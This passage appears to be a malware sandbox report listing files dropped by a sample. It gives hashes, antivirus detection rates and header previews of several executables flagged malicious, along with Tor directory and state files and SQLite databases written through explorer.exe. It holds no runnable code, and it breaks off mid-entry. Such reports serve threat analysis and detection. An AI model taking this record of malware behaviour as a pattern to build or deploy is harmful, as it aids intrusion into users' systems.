                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...................................4...........!..L.!This program cannot be run in DOS mode....$...............................................z.....3().....Rich........................................................................................................................PE..L...H(ie...........!..... ...`&..............0................................&............@.........................;..d....9........$...................... $..\..P0...............................................0..D............................text............ .................. ..`.rdata..[....0.......0..............@..@.data.......@.......@..............@...CRT.................................@....rsrc.........$.......$................@.reloc..To... $..p....$.............@..B............................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):1100576
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.110625532624431
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:12288:WfQ2ClMbe9GN3OaVtikV2+i88A6nY3Z/1t9NkuuSeyuuamkGCjkymB:WfQfMbe9GN3OaVUMi88A3pNNfCjjA
                                                                                                                                                                                                                                                                                                                MD5:D26B3F28D2687A79CED195BA9899B524
                                                                                                                                                                                                                                                                                                                SHA1:ECFA29D0D1A4577A822CAFB67BAA631E6A6BA01E
                                                                                                                                                                                                                                                                                                                SHA-256:C8F9BFA859FC17E05A929289872E153807149E1313968A566CE6F74C1092E4E1
                                                                                                                                                                                                                                                                                                                SHA-512:896BCA3F17DA88CE88EA60011F5A52FDC47DBD59DE6BB9519CE569FD101E70E10C122FDEE5AEF30404EA3289E0D6A45503F34E98AC3E6C939DD51BD691034745
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xL.xL.xL:.{M.xL:.}MC.xL:.|M..xL..|M..xL..{M..xL:.yM.xL.yLm.xL..}M..xL(.}M.xL(.L.xL(.zM.xLRich.xL................PE..L.....ie...............".^...j...............p....@.......................................@..................................r..<.......<............... .......,K.....8..............................@............p...............................text...[\.......^.................. ..`.rdata..;....p.......b..............@..@.data....].......B..................@....idata..[....p.......:..............@..@.00cfg...............N..............@..@.rsrc...<............P..............@..@.reloc..#X.......Z...V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):311296
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.287791894320628
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:6144:2fSw9KStWg/6j7WmRbChklagnN6V3YOp69a:2fag/6j7zJkkcSexII
                                                                                                                                                                                                                                                                                                                MD5:33A60439E95F0DFC10016075F97AEB0C
                                                                                                                                                                                                                                                                                                                SHA1:FB3595F8A5F9C243E5AD108FF11BC5CB2400EC2B
                                                                                                                                                                                                                                                                                                                SHA-256:0F6DB13C0239CA113C19EBEAEC8F3243572FD365C3396EFF1777115BC08849A1
                                                                                                                                                                                                                                                                                                                SHA-512:C08FF3D27EB92B369BBDCFB5EE3405E345BB3DE3004B985BA48B4308D22851403CFC440B8242C1F4CCBBB75986FEEAD1C800BDDD58A225274386B878AAAD9A90
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 49%
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L....u-d.....................n:.....:.............@..........................P=.................................................<.....;.............................................................@G..@............................................text............................... ..`.data....8.........................@....rsrc.........;.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):20852
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.051534614948206
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:384:rh4YVc1h1yd4AW9V9hC1hIhtMY4QkV6icO1hMtqc2q48XVd91hMB/ea4igBVA1hy:lxyhyrqvUgRBkoicOaq8nX982a9gBSyT
                                                                                                                                                                                                                                                                                                                MD5:88449A1C4717DE8E75B3988F7A1EB140
                                                                                                                                                                                                                                                                                                                SHA1:454B398BF5745A8578B1A738B69A065F79E0EAC6
                                                                                                                                                                                                                                                                                                                SHA-256:4954E1C949C3175EB4CB651062129FA8387EF943F8A972A1ABD521C73A712DAA
                                                                                                                                                                                                                                                                                                                SHA-512:63A9E283F76C4494BAB020B575CF95C24ED13D8207F333CB43DCEBC77A4C04EC38E19014EE7C3663FA68B1E02F55568491954DCF463812C3DEBA6512CE77EE61
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint E8A9C45EDE6D711294FADF8E7951F4DE6CA56B58..dir-key-published 2023-04-25 08:58:01..dir-key-expires 2024-10-25 08:58:01..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu/DOrbv/4IAYvyxsy/6ivC3q5yCQBWLKHZGYKQa5G/3rem8wen0f..qF7y4ye6U6faWc5kcNMHEKMIeBzMErxwF345qoGHITxbbOWnizgwPgrdCwlK3p0H..1XZGU/TTjoaM25P+ZNCBvGmDQRAtgs2odnv+i8hpu6vrcAUZYXmmw/Ag1Ou2AlLC..mPpbjV1O5SMylgC4IuCBPr3iA+M1kKkvj4LmwU6pJxjAae76GLzzQ/Ffvi7rRpvU..2BHetjehk+7/t8izgbhT4VABtzKgrv9ATnhfEgPeT/WBq0E75iciBBAXRPF5kEA4..k++NPy21XpL7jkQ4wnMs2HyiFhHbUwbLcoyQ/JVq/WBboSwStYbkdizRpkhJ1eNg..LiD8CPWcZnhWZi9VWrwT0xl+Mu4v6kwo9kVnXhOfcK8Wni9FqiBu2tmNDoGPG1Ac..wptYQSIoujuLgn4MARREwo9cWrKp2w+D7Dt4U7U5OrXL7TXjonEKuEHwRhzz1JA8..7LXm/wENwn1/AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAv28sclFL4zONBiZYTd2gE8dHTId7hsjP98H4PcY+IeVPs2hqdCTA..O0SsaOEGL9kGzzhWr7NUujDzHJ6j9xiCj4vePC/78/lN5tihjTD4TNzcrxEI6K08..mE6B5iXyuafojb7d1/3ssZ/qDjyj
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):2829927
                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.617702274208421
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:12288:h7MDR713gV/c6p1YiZJIEPNniR8AlkmIVyaDRt0GzgeAvhHxohjevh4:hw97hvQYq5iRvtI4aDRhxA2evh4
                                                                                                                                                                                                                                                                                                                MD5:9CA8CE2E8605A09C2C6ECF6C5FCEC1B8
                                                                                                                                                                                                                                                                                                                SHA1:33DFAD62C49A78A05CDFD842202BF7DA4C497809
                                                                                                                                                                                                                                                                                                                SHA-256:01EF2A913FFBF6E9D8CB93E46289E3722A19FA5A5200B8480052C258775EDB4C
                                                                                                                                                                                                                                                                                                                SHA-512:5D0C42D4C7F080CE430CCEF46CD57CF9F5C30C9D709290FF6339B210A7228AB1AA8E243DE86C57933E4832C421701E57950370E2A00939EAB7A78FCFF799D210
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-02 00:00:00.fresh-until 2023-12-02 01:00:00.valid-until 2023-12-02 03:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6852)
                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                Size (bytes):21554454
                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.824579521907917
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:24576:UzmLnmRYDHPyUFLVHujRTID1/Mva/vTanQJYPX/gA3kxrrA6QSLYGVFM2Hm/fAyi:RmAPKsOd7nZhCtJlbc3QizFJOuz2
                                                                                                                                                                                                                                                                                                                MD5:5CE7F627FEEB0DCBC1967AEC24224F01
                                                                                                                                                                                                                                                                                                                SHA1:C623F63342FED542B86743D3D5E701753BCC1654
                                                                                                                                                                                                                                                                                                                SHA-256:A573D45BF0D10C9D63809821F12A31817F578FFA763B7A27CC299A8580B3AE0C
                                                                                                                                                                                                                                                                                                                SHA-512:E1FAD490841502AF76388B18541520962CF948B1AB369ECF91BD86EA4F5A155038EA9A1C9A78F2855954D2DDBDC9BF34E4D5DBA4B8A7DA84634D56A358F9FF7D
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:@last-listed 2023-12-02 01:10:00.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMr87tUMQyuS+axcsjPCV+N9/xeXSeezAH1iu64ANVD/nTvfuKFzJSen.tgqBhnawchokQooB/J1YHu8baTAnz1/XROVhlhXGAhkbo+iO+a2WlpguQVm4mLOs.4/GW3GxJInDuzNEBB5erYHPMc5ogeRYeUyz7iKvZiwk6MJEaXVpfAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key YLt7Dj4jVs0ZaEl8+UmZznoK74EMz9LanluuXs6WLjU.id ed25519 ap/1HQWkPgU+UuEU4PSSd5SI/Rm22b5d5cEEXdPDPBM.@last-listed 2023-12-02 01:10:00.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALOeVggCI+LG/qf2jlg9hkzvllhFmZtwV0sEw5/8UuiarFkroHK517F4.fKTR2jnqc+LkwcTdUs478SkijV4yJ67bO93yDpHQJhGEI+8XFQJoHEansT8577pr.Ryiu/d1/+VxVIY4egaqaJ5ApQFO/MwTwCpz5CKfKMQKHDNSzKUbzAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key GrIT61YlqHHY8S7qlFZSYbXugIWV6p1iRP5hxrfbuyc.family $4A45D77F5BF5B270F64622676065D9C2B25EF220 $CBA7A9EC18BA2E351C529BED462D467A5384A835 $D6D2E428001D0C5CA1153555F2BEEC181B10785D.id ed25519 bMn/uiSRUEYYrH9Q6FQTkHrK/8swVkq5eqqGWZVMFEI.@last-listed 2023-12-02 01:10:00.onion-key.-----BEG
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (353), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):3905
                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.333150028630539
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:96:SwJRKOEP3hAxcMpjyZaWVZjr4hexnzktZkL:xSPvtnr4e9z9
                                                                                                                                                                                                                                                                                                                MD5:B1CE6DCF992C83189BBCD8332E57B0E2
                                                                                                                                                                                                                                                                                                                SHA1:307556B00D4FB48055AC768A1DFC3FC5FBE53948
                                                                                                                                                                                                                                                                                                                SHA-256:84B4972A7C3D2FB7A130F9B11984B5A1333CC7909B54DDD8801F8F05D208AD5C
                                                                                                                                                                                                                                                                                                                SHA-512:990153F45FB59E6DEB7C784773EE1D2831B174D48132EE47E8A146AD9CEDEB2AF53973572AE796C8F9965DBD22370FE163F5DC3AD8DCFE5E8DAB323EFC412C7F
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2023-12-02 02:16:52 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 525 1..CircuitBuildTimeBin 625 1..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 2975 1..CircuitBuildTimeBin 5625 1..CircuitBuildTimeBin 6275 1..CircuitBuildTimeBin 6525 1..CircuitBuildTimeBin 6625 1..CircuitBuildTimeBin 7325 1..CircuitBuildTimeBin 15875 1..Dormant 0..Guard in=default rsa_id=74DFE78731F875B6665E04E5751BB667C66784DB nickname=ATLurmyivna sampled_on=2023-11-25T15:53:38 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-11-30T17:55:22 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=6.000000 pb_circ_attempts=11.000000 pb_circ_successes=11.000000 pb_successful_circuits_closed=11.000000..Guard in=default rsa_id=8498DF1A123D9A614297B5074791C1D033A41DE4 nickname=RDPdotSH sampled_on=2023-11-29T13:41:56 sampled_idx=1 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=A4436E
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):2829927
                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.617702274208421
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:12288:h7MDR713gV/c6p1YiZJIEPNniR8AlkmIVyaDRt0GzgeAvhHxohjevh4:hw97hvQYq5iRvtI4aDRhxA2evh4
                                                                                                                                                                                                                                                                                                                MD5:9CA8CE2E8605A09C2C6ECF6C5FCEC1B8
                                                                                                                                                                                                                                                                                                                SHA1:33DFAD62C49A78A05CDFD842202BF7DA4C497809
                                                                                                                                                                                                                                                                                                                SHA-256:01EF2A913FFBF6E9D8CB93E46289E3722A19FA5A5200B8480052C258775EDB4C
                                                                                                                                                                                                                                                                                                                SHA-512:5D0C42D4C7F080CE430CCEF46CD57CF9F5C30C9D709290FF6339B210A7228AB1AA8E243DE86C57933E4832C421701E57950370E2A00939EAB7A78FCFF799D210
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-02 00:00:00.fresh-until 2023-12-02 01:00:00.valid-until 2023-12-02 03:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):2037760
                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.895271771869351
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:49152:JpOMJqAtfj8YFWZUQUqxbhS+oWOKl9BoKzLPGz+fATq:BJqaj8S8zUqx0xW1KKzLP8w
                                                                                                                                                                                                                                                                                                                MD5:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                SHA1:6BCD1915173D57D369E209943BE31EEBEBDD535A
                                                                                                                                                                                                                                                                                                                SHA-256:9D3C881C29156B8FD82CED7C7726C4C65D4E741533C9F886112F440698B1469D
                                                                                                                                                                                                                                                                                                                SHA-512:3C14531CD81AC2276CAC72DA573CB5F452C53B96175ACCA025A8E30251C487FCD382A8BC25A5241E6700832DBB760313BF9E51FFA0FCD480D5DDC6662CBC02E1
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 49%
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...#.|d.................V....:.....J........p....@...........................W.............................................pY..<.....V.............................................................PG..@............................................text....T.......V.................. ..`.data....8..p.......Z..............@....rsrc.........V......t..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):306176
                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.255280797294316
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:6144:/rsS9KwaWUQco8ODmuHkrr0BcGNBEm0p6:/rJ9KQUQP8w5krATBmI
                                                                                                                                                                                                                                                                                                                MD5:41C7BCD9B6084D7A61B8A54DF1A525E0
                                                                                                                                                                                                                                                                                                                SHA1:5B7EBEB8AC0AC31F42A2DF2087841ADA797CBC66
                                                                                                                                                                                                                                                                                                                SHA-256:6BEA0694893D00F8537BA95265A714077F4C7854DA105B36225D9F995F9E3514
                                                                                                                                                                                                                                                                                                                SHA-512:C74F039B22247CAF3224E2D39090D9CC627DDA14FD1FF3521CF1C7A2204D995097F82245B4A5EDBA5522BCF6CBB5719CC58691F37D2FE23DEC9496874FE5DA6D
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L....TUd................. ...::.............0....@..........................0=.............................................P$..<.....;..9..........................................................`I..@............................................text............ .................. ..`.data....8..0...N...$..............@....rsrc....9....;..:...r..............@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                                                                                                MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                                                                                                SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                                                                                                SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                                                                                                SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
